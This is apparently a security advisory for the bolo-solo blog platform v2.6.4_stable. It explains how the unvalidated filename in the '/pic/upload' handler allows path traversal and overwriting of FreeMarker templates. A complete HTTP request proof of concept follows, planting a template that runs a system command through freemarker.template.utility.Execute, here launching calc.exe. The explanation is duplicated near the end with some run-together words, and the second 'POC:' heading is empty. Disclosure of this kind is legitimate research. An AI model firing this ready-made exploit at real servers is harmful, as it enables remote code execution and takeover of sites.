In the bolo-solo v2.6.4_stable version, there is a RCE vulnerability caused by arbitrary file writing in the "/pic/upload" function. The reason is the lack of security verification for the file name.
Vulnerability file:src/main/java/org/b3log/solo/bolo/pic/PicUploadProcessor.java
When using the uploadPicture() method for file upload, the lack of security validation on the uploaded file leads to arbitrary file upload, arbitrary file write, and directory traversal. The file is written to the server via item.write(file).
Although the item.delete() method is used to delete the temporary file, it does not affect the file that has already been uploaded and written to the server.
Successfully uploaded:
The website uses FreeMarker for rendering; therefore, arbitrary file write can be used to modify .ftl template files, leading to RCE. Modify the index.ftl file under the path \bolo-solo-2.6.4\classes\artifacts\bolo_war_exploded\skins\bolo-next.
Successfully modified the .ftl file.
Changed the skin, accessed the page, and successfully triggered a calculator (RCE).
POC:
POST /pic/upload HTTP/1.1
Host: localhost:8080
Content-Length: 1042
sec-ch-ua-platform: "Windows"
Accept-Language: zh-CN,zh;q=0.9
sec-ch-ua: "Not_A Brand";v="99", "Chromium";v="142"
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydUE2vdanfzRJfFxA
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: */*
Origin: http://localhost:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/admin-index.do
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
------WebKitFormBoundarydUE2vdanfzRJfFxA
Content-Disposition: form-data; name="file"; filename="/skins/bolo-next/index.ftl"
Content-Type: application/x-zip-compressed
<#include "../../common-template/macro-common_head.ftl">
<#include 'header.ftl'>
<#assign ex="freemarker.template.utility.Execute"?new()>
${ex("calc.exe")}
<body nonce-data="4fb3a4be0d" class="home blog hfeed chinese-font">
<div class="scrollbar" id="bar">
</div>
<section id="main-container">
<div class="headertop filter-dot">
<#include 'macro-header.ftl'>
<div id="content" class="site-content">
<div id="primary" class="content-area">
<#if pjax><!---- pjax {#pjax} start ----></#if>
<#include "article-list.ftl">
<#if pjax><!---- pjax {#pjax} end ----></#if>
</div>
</div>
</div>
<#include 'macro-footer.ftl'>
</section>
<#include 'side-mobile.ftl'>
<#include 'footer.ftl'>
</body>
</html>
------WebKitFormBoundarydUE2vdanfzRJfFxA--
In the bolo-solo v2.6.4_stable version, there is a RCE vulnerability caused by arbitrary file writing in the "/pic/upload" function. The reason is the lack of security verification for the file name.
Vulnerability file:src/main/java/org/b3log/solo/bolo/pic/PicUploadProcessor.java
When using the uploadPicture() method for file upload, the lack of security validation on the uploaded file leads to arbitrary file upload, arbitrary file write, and directory traversal. The file is written to the server via item.write(file).
Although the
item.delete()method is used to delete the temporary file, it does not affect the file that has already been uploaded and written to the server.Successfully uploaded:
The website uses FreeMarker for rendering; therefore, arbitrary file write can be used to modify
.ftltemplate files, leading to RCE. Modify theindex.ftlfile under the path\bolo-solo-2.6.4\classes\artifacts\bolo_war_exploded\skins\bolo-next.Successfully modified the
.ftlfile.Changed the skin, accessed the page, and successfully triggered a calculator (RCE).
POC: